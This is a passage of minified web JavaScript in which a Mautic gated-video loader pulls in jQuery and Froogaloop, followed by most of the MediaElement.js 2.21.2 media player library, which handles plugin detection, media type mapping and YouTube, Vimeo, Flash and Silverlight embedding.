MauticJS.mauticInsertedScripts.jQuery){MauticJS.insertScript('https://ariticpinpoint.myfitfuel.in/ma/media/js/2.jquery.js');MauticJS.mauticInsertedScripts.jQuery=true;} if("undefined"==typeof Froogaloop&&"undefined"==typeof MauticJS.mauticInsertedScripts.Froogaloop){MauticJS.insertScript('https://f.vimeocdn.com/js/froogaloop2.min.js');MauticJS.mauticInsertedScripts.Froogaloop=true;} if("undefined"==typeof jQuery||"undefined"==typeof Froogaloop){MauticJS.gatedVideoTimeoutID=window.setTimeout(MauticJS.initGatedVideo,1000);}else{MauticJS.insertStyle('https://ariticpinpoint.myfitfuel.in/ma/media/css/mediaelementplayer.css'); /*! * * MediaElement.js * HTML5 <video> and <audio> shim and player * http://mediaelementjs.com/ * * Creates a JavaScript object that mimics HTML5 MediaElement API * for browsers that don't understand HTML5 or can't play the provided codec * Can play MP4 (H.264), Ogg, WebM, FLV, WMV, WMA, ACC, and MP3 * * Copyright 2010-2014, John Dyer (http://j.hn) * License: MIT * */ var mejs=mejs||{};mejs.version="2.21.2",mejs.meIndex=0,mejs.plugins={silverlight:[{version:[3,0],types:["video/mp4","video/m4v","video/mov","video/wmv","audio/wma","audio/m4a","audio/mp3","audio/wav","audio/mpeg"]}],flash:[{version:[9,0,124],types:["video/mp4","video/m4v","video/mov","video/flv","video/rtmp","video/x-flv","audio/flv","audio/x-flv","audio/mp3","audio/m4a","audio/mpeg","video/dailymotion","video/x-dailymotion","application/x-mpegURL"]}],youtube:[{version:null,types:["video/youtube","video/x-youtube","audio/youtube","audio/x-youtube"]}],vimeo:[{version:null,types:["video/vimeo","video/x-vimeo"]}]},mejs.Utility={encodeUrl:function(a){return encodeURIComponent(a)},escapeHTML:function(a){return a.toString().split("&").join("&amp;").split("<").join("&lt;").split('"').join("&quot;")},absolutizeUrl:function(a){var b=document.createElement("div");return b.innerHTML='<a href="'+this.escapeHTML(a)+'">x</a>',b.firstChild.href},getScriptPath:function(a){for(var b,c,d,e,f,g,h=0,i="",j="",k=document.getElementsByTagName("script"),l=k.length,m=a.length;l>h;h++){for(e=k[h].src,c=e.lastIndexOf("/"),c>-1?(g=e.substring(c+1),f=e.substring(0,c+1)):(g=e,f=""),b=0;m>b;b++)if(j=a[b],d=g.indexOf(j),d>-1){i=f;break}if(""!==i)break}return i},calculateTimeFormat:function(a,b,c){0>a&&(a=0),"undefined"==typeof c&&(c=25);var d=b.timeFormat,e=d[0],f=d[1]==d[0],g=f?2:1,h=":",i=Math.floor(a/3600)%24,j=Math.floor(a/60)%60,k=Math.floor(a%60),l=Math.floor((a%1*c).toFixed(3)),m=[[l,"f"],[k,"s"],[j,"m"],[i,"h"]];d.length<g&&(h=d[g]);for(var n=!1,o=0,p=m.length;p>o;o++)if(-1!==d.indexOf(m[o][1]))n=!0;else if(n){for(var q=!1,r=o;p>r;r++)if(m[r][0]>0){q=!0;break}if(!q)break;f||(d=e+d),d=m[o][1]+h+d,f&&(d=m[o][1]+d),e=m[o][1]}b.currentTimeFormat=d},twoDigitsString:function(a){return 10>a?"0"+a:String(a)},secondsToTimeCode:function(a,b){if(0>a&&(a=0),"object"!=typeof b){var c="m:ss";c=arguments[1]?"hh:mm:ss":c,c=arguments[2]?c+":ff":c,b={currentTimeFormat:c,framesPerSecond:arguments[3]||25}}var d=b.framesPerSecond;"undefined"==typeof d&&(d=25);var c=b.currentTimeFormat,e=Math.floor(a/3600)%24,f=Math.floor(a/60)%60,g=Math.floor(a%60),h=Math.floor((a%1*d).toFixed(3));lis=[[h,"f"],[g,"s"],[f,"m"],[e,"h"]];var j=c;for(i=0,len=lis.length;i<len;i++)j=j.replace(lis[i][1]+lis[i][1],this.twoDigitsString(lis[i][0])),j=j.replace(lis[i][1],lis[i][0]);return j},timeCodeToSeconds:function(a,b,c,d){"undefined"==typeof c?c=!1:"undefined"==typeof d&&(d=25);var e=a.split(":"),f=parseInt(e[0],10),g=parseInt(e[1],10),h=parseInt(e[2],10),i=0,j=0;return c&&(i=parseInt(e[3])/d),j=3600*f+60*g+h+i},convertSMPTEtoSeconds:function(a){if("string"!=typeof a)return!1;a=a.replace(",",".");var b=0,c=-1!=a.indexOf(".")?a.split(".")[1].length:0,d=1;a=a.split(":").reverse();for(var e=0;e<a.length;e++)d=1,e>0&&(d=Math.pow(60,e)),b+=Number(a[e])*d;return Number(b.toFixed(c))},removeSwf:function(a){var b=document.getElementById(a);b&&/object|embed/i.test(b.nodeName)&&(mejs.MediaFeatures.isIE?(b.style.display="none",function(){4==b.readyState?mejs.Utility.removeObjectInIE(a):setTimeout(arguments.callee,10)}()):b.parentNode.removeChild(b))},removeObjectInIE:function(a){var b=document.getElementById(a);if(b){for(var c in b)"function"==typeof b[c]&&(b[c]=null);b.parentNode.removeChild(b)}},determineScheme:function(a){return a&&-1!=a.indexOf("://")?a.substr(0,a.indexOf("://")+3):"//"}},mejs.PluginDetector={hasPluginVersion:function(a,b){var c=this.plugins[a];return b[1]=b[1]||0,b[2]=b[2]||0,c[0]>b[0]||c[0]==b[0]&&c[1]>b[1]||c[0]==b[0]&&c[1]==b[1]&&c[2]>=b[2]?!0:!1},nav:window.navigator,ua:window.navigator.userAgent.toLowerCase(),plugins:[],addPlugin:function(a,b,c,d,e){this.plugins[a]=this.detectPlugin(b,c,d,e)},detectPlugin:function(a,b,c,d){var e,f,g,h=[0,0,0];if("undefined"!=typeof this.nav.plugins&&"object"==typeof this.nav.plugins[a]){if(e=this.nav.plugins[a].description,e&&("undefined"==typeof this.nav.mimeTypes||!this.nav.mimeTypes[b]||this.nav.mimeTypes[b].enabledPlugin))for(h=e.replace(a,"").replace(/^\s+/,"").replace(/\sr/gi,".").split("."),f=0;f<h.length;f++)h[f]=parseInt(h[f].match(/\d+/),10)}else if("undefined"!=typeof window.ActiveXObject)try{g=new ActiveXObject(c),g&&(h=d(g))}catch(i){}return h}},mejs.PluginDetector.addPlugin("flash","Shockwave Flash","application/x-shockwave-flash","ShockwaveFlash.ShockwaveFlash",function(a){var b=[],c=a.GetVariable("$version");return c&&(c=c.split(" ")[1].split(","),b=[parseInt(c[0],10),parseInt(c[1],10),parseInt(c[2],10)]),b}),mejs.PluginDetector.addPlugin("silverlight","Silverlight Plug-In","application/x-silverlight-2","AgControl.AgControl",function(a){var b=[0,0,0,0],c=function(a,b,c,d){for(;a.isVersionSupported(b[0]+"."+b[1]+"."+b[2]+"."+b[3]);)b[c]+=d;b[c]-=d};return c(a,b,0,1),c(a,b,1,1),c(a,b,2,1e4),c(a,b,2,1e3),c(a,b,2,100),c(a,b,2,10),c(a,b,2,1),c(a,b,3,1),b}),mejs.MediaFeatures={init:function(){var a,b,c=this,d=document,e=mejs.PluginDetector.nav,f=mejs.PluginDetector.ua.toLowerCase(),g=["source","track","audio","video"];c.isiPad=null!==f.match(/ipad/i),c.isiPhone=null!==f.match(/iphone/i),c.isiOS=c.isiPhone||c.isiPad,c.isAndroid=null!==f.match(/android/i),c.isBustedAndroid=null!==f.match(/android 2\.[12]/),c.isBustedNativeHTTPS="https:"===location.protocol&&(null!==f.match(/android [12]\./)||null!==f.match(/macintosh.* version.* safari/)),c.isIE=-1!=e.appName.toLowerCase().indexOf("microsoft")||null!==e.appName.toLowerCase().match(/trident/gi),c.isChrome=null!==f.match(/chrome/gi),c.isChromium=null!==f.match(/chromium/gi),c.isFirefox=null!==f.match(/firefox/gi),c.isWebkit=null!==f.match(/webkit/gi),c.isGecko=null!==f.match(/gecko/gi)&&!c.isWebkit&&!c.isIE,c.isOpera=null!==f.match(/opera/gi),c.hasTouch="ontouchstart"in window,c.svgAsImg=!!document.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image","1.1");for(a=0;a<g.length;a++)b=document.createElement(g[a]);c.supportsMediaTag="undefined"!=typeof b.canPlayType||c.isBustedAndroid;try{b.canPlayType("video/mp4")}catch(h){c.supportsMediaTag=!1}c.supportsPointerEvents=function(){var a,b=document.createElement("x"),c=document.documentElement,d=window.getComputedStyle;return"pointerEvents"in b.style?(b.style.pointerEvents="auto",b.style.pointerEvents="x",c.appendChild(b),a=d&&"auto"===d(b,"").pointerEvents,c.removeChild(b),!!a):!1}(),c.hasFirefoxPluginMovingProblem=!1,c.hasiOSFullScreen="undefined"!=typeof b.webkitEnterFullscreen,c.hasNativeFullscreen="undefined"!=typeof b.requestFullscreen,c.hasWebkitNativeFullScreen="undefined"!=typeof b.webkitRequestFullScreen,c.hasMozNativeFullScreen="undefined"!=typeof b.mozRequestFullScreen,c.hasMsNativeFullScreen="undefined"!=typeof b.msRequestFullscreen,c.hasTrueNativeFullScreen=c.hasWebkitNativeFullScreen||c.hasMozNativeFullScreen||c.hasMsNativeFullScreen,c.nativeFullScreenEnabled=c.hasTrueNativeFullScreen,c.hasMozNativeFullScreen?c.nativeFullScreenEnabled=document.mozFullScreenEnabled:c.hasMsNativeFullScreen&&(c.nativeFullScreenEnabled=document.msFullscreenEnabled),c.isChrome&&(c.hasiOSFullScreen=!1),c.hasTrueNativeFullScreen&&(c.fullScreenEventName="",c.hasWebkitNativeFullScreen?c.fullScreenEventName="webkitfullscreenchange":c.hasMozNativeFullScreen?c.fullScreenEventName="mozfullscreenchange":c.hasMsNativeFullScreen&&(c.fullScreenEventName="MSFullscreenChange"),c.isFullScreen=function(){return c.hasMozNativeFullScreen?d.mozFullScreen:c.hasWebkitNativeFullScreen?d.webkitIsFullScreen:c.hasMsNativeFullScreen?null!==d.msFullscreenElement:void 0},c.requestFullScreen=function(a){c.hasWebkitNativeFullScreen?a.webkitRequestFullScreen():c.hasMozNativeFullScreen?a.mozRequestFullScreen():c.hasMsNativeFullScreen&&a.msRequestFullscreen()},c.cancelFullScreen=function(){c.hasWebkitNativeFullScreen?document.webkitCancelFullScreen():c.hasMozNativeFullScreen?document.mozCancelFullScreen():c.hasMsNativeFullScreen&&document.msExitFullscreen()}),c.hasiOSFullScreen&&f.match(/mac os x 10_5/i)&&(c.hasNativeFullScreen=!1,c.hasiOSFullScreen=!1)}},mejs.MediaFeatures.init(),mejs.HtmlMediaElement={pluginType:"native",isFullScreen:!1,setCurrentTime:function(a){this.currentTime=a},setMuted:function(a){this.muted=a},setVolume:function(a){this.volume=a},stop:function(){this.pause()},setSrc:function(a){for(var b=this.getElementsByTagName("source");b.length>0;)this.removeChild(b[0]);if("string"==typeof a)this.src=a;else{var c,d;for(c=0;c<a.length;c++)if(d=a[c],this.canPlayType(d.type)){this.src=d.src;break}}},setVideoSize:function(a,b){this.width=a,this.height=b}},mejs.PluginMediaElement=function(a,b,c){this.id=a,this.pluginType=b,this.src=c,this.events={},this.attributes={}},mejs.PluginMediaElement.prototype={pluginElement:null,pluginType:"",isFullScreen:!1,playbackRate:-1,defaultPlaybackRate:-1,seekable:[],played:[],paused:!0,ended:!1,seeking:!1,duration:0,error:null,tagName:"",muted:!1,volume:1,currentTime:0,play:function(){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType?this.pluginApi.playVideo():this.pluginApi.playMedia(),this.paused=!1)},load:function(){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType||this.pluginApi.loadMedia(),this.paused=!1)},pause:function(){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType?this.pluginApi.pauseVideo():this.pluginApi.pauseMedia(),this.paused=!0)},stop:function(){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType?this.pluginApi.stopVideo():this.pluginApi.stopMedia(),this.paused=!0)},canPlayType:function(a){var b,c,d,e=mejs.plugins[this.pluginType];for(b=0;b<e.length;b++)if(d=e[b],mejs.PluginDetector.hasPluginVersion(this.pluginType,d.version))for(c=0;c<d.types.length;c++)if(a==d.types[c])return"probably";return""},positionFullscreenButton:function(a,b,c){null!=this.pluginApi&&this.pluginApi.positionFullscreenButton&&this.pluginApi.positionFullscreenButton(Math.floor(a),Math.floor(b),c)},hideFullscreenButton:function(){null!=this.pluginApi&&this.pluginApi.hideFullscreenButton&&this.pluginApi.hideFullscreenButton()},setSrc:function(a){if("string"==typeof a)this.pluginApi.setSrc(mejs.Utility.absolutizeUrl(a)),this.src=mejs.Utility.absolutizeUrl(a);else{var b,c;for(b=0;b<a.length;b++)if(c=a[b],this.canPlayType(c.type)){this.pluginApi.setSrc(mejs.Utility.absolutizeUrl(c.src)),this.src=mejs.Utility.absolutizeUrl(c.src);break}}},setCurrentTime:function(a){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType?this.pluginApi.seekTo(a):this.pluginApi.setCurrentTime(a),this.currentTime=a)},setVolume:function(a){null!=this.pluginApi&&("youtube"==this.pluginType?this.pluginApi.setVolume(100*a):this.pluginApi.setVolume(a),this.volume=a)},setMuted:function(a){null!=this.pluginApi&&("youtube"==this.pluginType?(a?this.pluginApi.mute():this.pluginApi.unMute(),this.muted=a,this.dispatchEvent({type:"volumechange"})):this.pluginApi.setMuted(a),this.muted=a)},setVideoSize:function(a,b){this.pluginElement&&this.pluginElement.style&&(this.pluginElement.style.width=a+"px",this.pluginElement.style.height=b+"px"),null!=this.pluginApi&&this.pluginApi.setVideoSize&&this.pluginApi.setVideoSize(a,b)},setFullscreen:function(a){null!=this.pluginApi&&this.pluginApi.setFullscreen&&this.pluginApi.setFullscreen(a)},enterFullScreen:function(){null!=this.pluginApi&&this.pluginApi.setFullscreen&&this.setFullscreen(!0)},exitFullScreen:function(){null!=this.pluginApi&&this.pluginApi.setFullscreen&&this.setFullscreen(!1)},addEventListener:function(a,b,c){this.events[a]=this.events[a]||[],this.events[a].push(b)},removeEventListener:function(a,b){if(!a)return this.events={},!0;var c=this.events[a];if(!c)return!0;if(!b)return this.events[a]=[],!0;for(var d=0;d<c.length;d++)if(c[d]===b)return this.events[a].splice(d,1),!0;return!1},dispatchEvent:function(a){var b,c=this.events[a.type];if(c)for(b=0;b<c.length;b++)c[b].apply(this,[a])},hasAttribute:function(a){return a in this.attributes},removeAttribute:function(a){delete this.attributes[a]},getAttribute:function(a){return this.hasAttribute(a)?this.attributes[a]:""},setAttribute:function(a,b){this.attributes[a]=b},remove:function(){mejs.Utility.removeSwf(this.pluginElement.id),mejs.MediaPluginBridge.unregisterPluginElement(this.pluginElement.id)}},mejs.MediaElementDefaults={mode:"auto",plugins:["flash","silverlight","youtube","vimeo"],enablePluginDebug:!1,httpsBasicAuthSite:!1,type:"",pluginPath:mejs.Utility.getScriptPath(["mediaelement.js","mediaelement.min.js","mediaelement-and-player.js","mediaelement-and-player.min.js"]),flashName:"flashmediaelement.swf",flashStreamer:"",flashScriptAccess:"sameDomain",enablePluginSmoothing:!1,enablePseudoStreaming:!1,pseudoStreamingStartQueryParam:"start",silverlightName:"silverlightmediaelement.xap",defaultVideoWidth:480,defaultVideoHeight:270,pluginWidth:-1,pluginHeight:-1,pluginVars:[],timerRate:250,startVolume:.8,success:function(){},error:function(){}},mejs.MediaElement=function(a,b){return mejs.HtmlMediaElementShim.create(a,b)},mejs.HtmlMediaElementShim={create:function(a,b){var c,d,e={},f="string"==typeof a?document.getElementById(a):a,g=f.tagName.toLowerCase(),h="audio"===g||"video"===g,i=h?f.getAttribute("src"):f.getAttribute("href"),j=f.getAttribute("poster"),k=f.getAttribute("autoplay"),l=f.getAttribute("preload"),m=f.getAttribute("controls");for(d in mejs.MediaElementDefaults)e[d]=mejs.MediaElementDefaults[d];for(d in b)e[d]=b[d];return i="undefined"==typeof i||null===i||""==i?null:i,j="undefined"==typeof j||null===j?"":j,l="undefined"==typeof l||null===l||"false"===l?"none":l,k=!("undefined"==typeof k||null===k||"false"===k),m=!("undefined"==typeof m||null===m||"false"===m),c=this.determinePlayback(f,e,mejs.MediaFeatures.supportsMediaTag,h,i),c.url=null!==c.url?mejs.Utility.absolutizeUrl(c.url):"",c.scheme=mejs.Utility.determineScheme(c.url),"native"==c.method?(mejs.MediaFeatures.isBustedAndroid&&(f.src=c.url,f.addEventListener("click",function(){f.play()},!1)),this.updateNative(c,e,k,l)):""!==c.method?this.createPlugin(c,e,j,k,l,m):(this.createErrorMessage(c,e,j),this)},determinePlayback:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,n,o,p,q=[],r={method:"",url:"",htmlMediaElement:a,isVideo:"audio"!=a.tagName.toLowerCase(),scheme:""};if("undefined"!=typeof b.type&&""!==b.type)if("string"==typeof b.type)q.push({type:b.type,url:e});else for(f=0;f<b.type.length;f++)q.push({type:b.type[f],url:e});else if(null!==e)k=this.formatType(e,a.getAttribute("type")),q.push({type:k,url:e});else for(f=0;f<a.childNodes.length;f++)j=a.childNodes[f],1==j.nodeType&&"source"==j.tagName.toLowerCase()&&(e=j.getAttribute("src"),k=this.formatType(e,j.getAttribute("type")),p=j.getAttribute("media"),(!p||!window.matchMedia||window.matchMedia&&window.matchMedia(p).matches)&&q.push({type:k,url:e}));if(!d&&q.length>0&&null!==q[0].url&&this.getTypeFromFile(q[0].url).indexOf("audio")>-1&&(r.isVideo=!1),mejs.MediaFeatures.isBustedAndroid&&(a.canPlayType=function(a){return null!==a.match(/video\/(mp4|m4v)/gi)?"maybe":""}),mejs.MediaFeatures.isChromium&&(a.canPlayType=function(a){return null!==a.match(/video\/(webm|ogv|ogg)/gi)?"maybe":""}),c&&("auto"===b.mode||"auto_plugin"===b.mode||"native"===b.mode)&&(!mejs.MediaFeatures.isBustedNativeHTTPS||b.httpsBasicAuthSite!==!0)){for(d||(o=document.createElement(r.isVideo?"video":"audio"),a.parentNode.insertBefore(o,a),a.style.display="none",r.htmlMediaElement=a=o),f=0;f<q.length;f++)if("video/m3u8"==q[f].type||""!==a.canPlayType(q[f].type).replace(/no/,"")||""!==a.canPlayType(q[f].type.replace(/mp3/,"mpeg")).replace(/no/,"")||""!==a.canPlayType(q[f].type.replace(/m4a/,"mp4")).replace(/no/,"")){r.method="native",r.url=q[f].url;break}if("native"===r.method&&(null!==r.url&&(a.src=r.url),"auto_plugin"!==b.mode))return r}if("auto"===b.mode||"auto_plugin"===b.mode||"shim"===b.mode)for(f=0;f<q.length;f++)for(k=q[f].type,g=0;g<b.plugins.length;g++)for(l=b.plugins[g],m=mejs.plugins[l],h=0;h<m.length;h++)if(n=m[h],null==n.version||mejs.PluginDetector.hasPluginVersion(l,n.version))for(i=0;i<n.types.length;i++)if(k.toLowerCase()==n.types[i].toLowerCase())return r.method=l,r.url=q[f].url,r;return"auto_plugin"===b.mode&&"native"===r.method?r:(""===r.method&&q.length>0&&(r.url=q[0].url),r)},formatType:function(a,b){return a&&!b?this.getTypeFromFile(a):b&&~b.indexOf(";")?b.substr(0,b.indexOf(";")):b},getTypeFromFile:function(a){a=a.split("?")[0];var b=a.substring(a.lastIndexOf(".")+1).toLowerCase(),c=/(mp4|m4v|ogg|ogv|m3u8|webm|webmv|flv|wmv|mpeg|mov)/gi.test(b)?"video/":"audio/";return this.getTypeFromExtension(b,c)},getTypeFromExtension:function(a,b){switch(b=b||"",a){case"mp4":case"m4v":case"m4a":case"f4v":case"f4a":return b+"mp4";case"flv":return b+"x-flv";case"webm":case"webma":case"webmv":return b+"webm";case"ogg":case"oga":case"ogv":return b+"ogg";case"m3u8":return"application/x-mpegurl";case"ts":return b+"mp2t";default:return b+a}},createErrorMessage:function(a,b,c){var d=a.htmlMediaElement,e=document.createElement("div"),f=b.customError;e.className="me-cannotplay";try{e.style.width=d.width+"px",e.style.height=d.height+"px"}catch(g){}f||(f='<a href="'+a.url+'">',""!==c&&(f+='<img src="'+c+'" width="100%" height="100%" alt="" />'),f+="<span>"+mejs.i18n.t("Download File")+"</span></a>"),e.innerHTML=f,d.parentNode.insertBefore(e,d),d.style.display="none",b.error(d)},createPlugin:function(a,b,c,d,e,f){var g,h,i,j=a.htmlMediaElement,k=1,l=1,m="me_"+a.method+"_"+mejs.meIndex++,n=new mejs.PluginMediaElement(m,a.method,a.url),o=document.createElement("div");n.tagName=j.tagName;for(var p=0;p<j.attributes.length;p++){var q=j.attributes[p];q.specified&&n.setAttribute(q.name,q.value)}for(h=j.parentNode;null!==h&&null!=h.tagName&&"body"!==h.tagName.toLowerCase()&&null!=h.parentNode&&null!=h.parentNode.tagName&&null!=h.parentNode.constructor&&"ShadowRoot"===h.parentNode.constructor.name;){if("p"===h.parentNode.tagName.toLowerCase()){h.parentNode.parentNode.insertBefore(h,h.parentNode);break}h=h.parentNode}switch(a.isVideo?(k=b.pluginWidth>0?b.pluginWidth:b.videoWidth>0?b.videoWidth:null!==j.getAttribute("width")?j.getAttribute("width"):b.defaultVideoWidth,l=b.pluginHeight>0?b.pluginHeight:b.videoHeight>0?b.videoHeight:null!==j.getAttribute("height")?j.getAttribute("height"):b.defaultVideoHeight,k=mejs.Utility.encodeUrl(k),l=mejs.Utility.encodeUrl(l)):b.enablePluginDebug&&(k=320,l=240),n.success=b.success,o.className="me-plugin",o.id=m+"_container",a.isVideo?j.parentNode.insertBefore(o,j):document.body.insertBefore(o,document.body.childNodes[0]),("flash"===a.method||"silverlight"===a.method)&&(i=["id="+m,"isvideo="+(a.isVideo?"true":"false"),"autoplay="+(d?"true":"false"),"preload="+e,"width="+k,"startvolume="+b.startVolume,"timerrate="+b.timerRate,"flashstreamer="+b.flashStreamer,"height="+l,"pseudostreamstart="+b.pseudoStreamingStartQueryParam],null!==a.url&&("flash"==a.method?i.push("file="+mejs.Utility.encodeUrl(a.url)):i.push("file="+a.url)),b.enablePluginDebug&&i.push("debug=true"),b.enablePluginSmoothing&&i.push("smoothing=true"),b.enablePseudoStreaming&&i.push("pseudostreaming=true"),f&&i.push("controls=true"),b.pluginVars&&(i=i.concat(b.pluginVars)),window[m+"_init"]=function(){switch(n.pluginType){case"flash":n.pluginElement=n.pluginApi=document.getElementById(m);break;case"silverlight":n.pluginElement=document.getElementById(n.id),n.pluginApi=n.pluginElement.Content.MediaElementJS}null!=n.pluginApi&&n.success&&n.success(n,j)},window[m+"_event"]=function(a,b){var c,d,e;c={type:a,target:n};for(d in b)n[d]=b[d],c[d]=b[d];e=b.bufferedTime||0,c.target.buffered=c.buffered={start:function(a){return 0},end:function(a){return e},length:1},n.dispatchEvent(c)}),a.method){case"silverlight":o.innerHTML='<object data="data:application/x-silverlight-2," type="application/x-silverlight-2" id="'+m+'" name="'+m+'" width="'+k+'" height="'+l+'" class="mejs-shim"><param name="initParams" value="'+i.join(",")+'" /><param name="windowless" value="true" /><param name="background" value="black" /><param name="minRuntimeVersion" value="3.0.0.0" /><param name="autoUpgrade" value="true" /><param name="source" value="'+b.pluginPath+b.silverlightName+'" /></object>';break;case"flash":mejs.MediaFeatures.isIE?(g=document.createElement("div"),o.appendChild(g),g.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="//download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="'+m+'" width="'+k+'" height="'+l+'" class="mejs-shim"><param name="movie" value="'+b.pluginPath+b.flashName+"?"+(new Date).getTime()+'" /><param name="flashvars" value="'+i.join("&amp;")+'" /><param name="quality" value="high" /><param name="bgcolor" value="#000000" /><param name="wmode" value="transparent" /><param name="allowScriptAccess" value="'+b.flashScriptAccess+'" /><param name="allowFullScreen" value="true" /><param name="scale" value="default" /></object>'):o.innerHTML='<embed id="'+m+'" name="'+m+'" play="true" loop="false" quality="high" bgcolor="#000000" wmode="transparent" allowScriptAccess="'+b.flashScriptAccess+'" allowFullScreen="true" type="application/x-shockwave-flash" pluginspage="//www.macromedia.com/go/getflashplayer" src="'+b.pluginPath+b.flashName+'" flashvars="'+i.join("&")+'" width="'+k+'" height="'+l+'" scale="default"class="mejs-shim"></embed>';break;case"youtube":var r;-1!=a.url.lastIndexOf("youtu.be")?(r=a.url.substr(a.url.lastIndexOf("/")+1),-1!=r.indexOf("?")&&(r=r.substr(0,r.indexOf("?")))):r=a.url.substr(a.url.lastIndexOf("=")+1),youtubeSettings={container:o,containerId:o.id,pluginMediaElement:n,pluginId:m,videoId:r,height:l,width:k,scheme:a.scheme},window.postMessage?mejs.YouTubeApi.enqueueIframe(youtubeSettings):mejs.PluginDetector.hasPluginVersion("flash",[10,0,0])&&mejs.YouTubeApi.createFlash(youtubeSettings,b);break;case"vimeo":var s=m+"_player";if(n.vimeoid=a.url.substr(a.url.lastIndexOf("/")+1),o.innerHTML='<iframe tabindex="-1" src="'+a.scheme+"player.vimeo.com/video/"+n.vimeoid+"?api=1&portrait=0&byline=0&title=0&player_id="+s+'" width="'+k+'" height="'+l+'" frameborder="0" class="mejs-shim" id="'+s+'" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>',"function"==typeof $f){var t=$f(o.childNodes[0]),u=-1;t.addEvent("ready",function(){function a(a,b,c,d){var e={type:c,target:b};"timeupdate"==c&&(b.currentTime=e.currentTime=d.seconds,b.duration=e.duration=d.duration),b.dispatchEvent(e)}t.playVideo=function(){t.api("play")},t.stopVideo=function(){t.api("unload")},t.pauseVideo=function(){t.api("pause")},t.seekTo=function(a){t.api("seekTo",a)},t.setVolume=function(a){t.api("setVolume",a)},t.setMuted=function(a){a?(t.lastVolume=t.api("getVolume"),t.api("setVolume",0)):(t.api("setVolume",t.lastVolume),delete t.lastVolume)},t.getPlayerState=function(){return u},t.addEvent("play",function(){u=1,a(t,n,"play"),a(t,n,"playing")}),t.addEvent("pause",function(){u=2,a(t,n,"pause")}),t.addEvent("finish",function(){u=0,a(t,n,"ended")}),t.addEvent("playProgress",function(b){a(t,n,"timeupdate",b)}),t.addEvent("seek",function(b){u=3,a(t,n,"seeked",b)}),t.addEvent("loadProgress",function(b){u=3,a(t,n,"progress",b)}),n.pluginElement=o,n.pluginApi=t,n.success(n,n.pluginElement)})}else console.warn("You need to include froogaloop for vimeo to work")}return j.style.display="none",j.removeAttribute("autoplay"),n},updateNative:function(a,b,c,d){var e,f=a.htmlMediaElement;for(e in mejs.HtmlMediaElement)f[e]=mejs.HtmlMediaElement[e];return b.success(f,f),f}},mejs.YouTubeApi={isIframeStarted:!1,isIframeLoaded:!1,loadIframeApi:function(a){if(!this.isIframeStarted){var b=document.createElement("script");b.src=a.scheme+"www.youtube.com/player_api";var c=document.getElementsByTagName("script")[0];c.parentNode.insertBefore(b,c),this.isIframeStarted=!0}},iframeQueue:[],enqueueIframe:function(a){this.isLoaded?this.createIframe(a):(this.loadIframeApi(a),this.iframeQueue.push(a))},createIframe:function(a){var b=a.pluginMediaElement,c=new YT.Player(a.containerId,{height:a.height,width:a.width,videoId:a.videoId,playerVars:{controls:0,wmode:"transparent"},events:{onReady:function(){c.setVideoSize=function(a,b){c.setSize(a,b)},a.pluginMediaElement.pluginApi=c,a.pluginMediaElement.pluginElement=document.getElementById(a.containerId),b.success(b,b.pluginElement),setInterval(function(){mejs.YouTubeApi.createEvent(c,b,"timeupdate")},250)},onStateChange:function(a){mejs.YouTubeApi.handleStateChange(a.data,c,b)}}})},createEvent:function(a,b,c){var d={type:c,target:b};if(a&&a.getDuration){b.currentTime=d.currentTime=a.getCurrentTime(),b.duration=d.duration=a.getDuration(),d.paused=b.paused,d.ended=b.ended,d.muted=a.isMuted(),d.volume=a.getVolume()/100,d.bytesTotal=a.getVideoBytesTotal(),d.bufferedBytes=a.getVideoBytesLoaded();var e=d.bufferedBytes/d.bytesTotal*d.duration;d.target.buffered=d.buffered={start:function(a){return 0},end:function(a){return e},length:1}}b.dispatchEvent(d)},iFrameReady:function(){for(this.isLoaded=!0,this.isIframeLoaded=!0;this.iframeQueue.length>0;){var a=this.iframeQueue.pop();this.createIframe(a)}},flashPlayers:{},createFlash:function(a){this.flashPlayers[a.pluginId]=a;var b,c=a.scheme+"www.youtube.com/apiplayer?enablejsapi=1&amp;playerapiid="+a.pluginId+"&amp;version=3&amp;autoplay=0&amp;controls=0&amp;modestbranding=1&loop=0&disablekb=1";mejs.MediaFeatures.isIE?(b=document.createElement("div"),a.container.appendChild(b),b.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="'+a.scheme+'download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="'+a.pluginId+'" width="'+a.width+'" height="'+a.height+'" class="mejs-shim"><param name="movie" value="'+c+'" /><param name="wmode" value="transparent" /><param name="allowScriptAccess" value="'+options.flashScriptAccess+'" /><param name="allowFullScreen" value="true" /></object>'):a.container.innerHTML='<object type="application/x-shockwave-flash" id="'+a.pluginId+'" data="'+c+'" width="'+a.width+'" height="'+a.height+'" style="visibility: visible; " class="mejs-shim"><param name="allowScriptAccess" value="'+options.flashScriptAccess+'"><param name="wmode" value="transparent"></object>'},flashReady:function(a){var b=this.flashPlayers[a],c=document.getElementById(a),d=b.pluginMediaElement;d.pluginApi=d.pluginElement=c,b.success(d,d.pluginElement),c.cueVideoById(b.videoId);var e=b.containerId+"_callback";window[e]=function(a){mejs.YouTubeApi.handleStateChange(a,c,d)},c.addEventListener("onStateChange",e),setInterval(function(){mejs.YouTubeApi.createEvent(c,d,"timeupdate")},250),mejs.YouTubeApi.createEvent(c,d,"canplay")},handleStateChange:function(a,b,c){switch(a){case-1:c.paused=!0,c.ended=!0,mejs.YouTubeApi.createEvent(b,c,"loadedmetadata");break;case 0:c.paused=!1,c.ended=!0,mejs.YouTubeApi.createEvent(b,c,"ended");break;case 1:c.paused=!1,c.ended=!1,mejs.YouTubeApi.createEvent(b,c,"play"),mejs.YouTubeApi.createEvent(b,c,"playing");break;case 2:c.paused=!0,c.ended=!1,mejs.YouTubeApi.createEvent(b,c,"pause");break;case 3:mejs.YouTubeApi.createEvent(b,c,"progress");break;case 